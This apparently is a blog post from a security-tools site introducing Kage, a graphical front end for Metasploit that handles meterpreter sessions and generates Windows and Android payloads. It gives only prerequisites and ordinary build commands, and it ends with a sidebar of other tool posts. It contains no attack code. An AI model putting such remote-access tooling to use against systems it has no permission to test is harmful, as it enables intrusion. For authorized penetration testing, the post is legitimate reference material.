Kage – Graphical User Interface for Metasploit Meterpreter & Session Handler

Kage (ka-geh) is a tool inspired by AhMyth designed for Metasploit RPC Server to interact with meterpreter sessions and generate payloads.
For now it only supports windows/meterpreter & android/meterpreter

Prerequisites

  • Metasploit-framework must be installed and in your PATH:
    • Msfrpcd
    • Msfvenom
    • Msfdb

Also Read – Legion : An Open Source, Easy-To-Use, Super-extensible & Semi-Automated Network Penetration Testing Tool

Installing

You can install Kage binaries from here.

for developers to run the app from source code:

Download source code
git clone https://github.com/WayzDev/Kage.git
Install dependencies and run kage
cd Kage
yarn # or npm install
yarn run dev # or npm run dev
to build project
yarn run build

electron-vue officially recommends the yarn package manager as it handles dependencies much better and can help reduce final build size with yarn clean.

Screenshots

Video Tutorial

Disclaimer

I will not be responsible for any direct or indirect damage caused due to the usage of this tool, it is for educational purposes only.

Credit : @iFalah

R K

Recent Posts

Promptmap

Prompt injection is a type of security vulnerability that can be exploited to control the…

2 days ago

Firefly – Black Box Fuzzer For Web Applications

Firefly is an advanced black-box fuzzer and not just a standard asset discovery tool. Firefly…

2 days ago

Winit : Cross-Platform Window Creation And Management In Rust

Winit is a robust, cross-platform library designed for creating and managing windows in Rust applications.…

2 days ago

Browser Autofill Phishing – The Hidden Dangers And Security Risks

In today’s digital age, convenience often comes at the cost of security. One such overlooked…

2 days ago

Terminal GPT (tgpt) – Your Direct CLI Gateway To ChatGPT 3.5

Terminal GPT (tgpt) offers a seamless way to bring the power of ChatGPT 3.5 directly…

2 days ago

garak, LLM Vulnerability Scanner : The Comprehensive Tool For Assessing Language Model Security

garak checks if an LLM can be made to fail in a way we don't…

5 days ago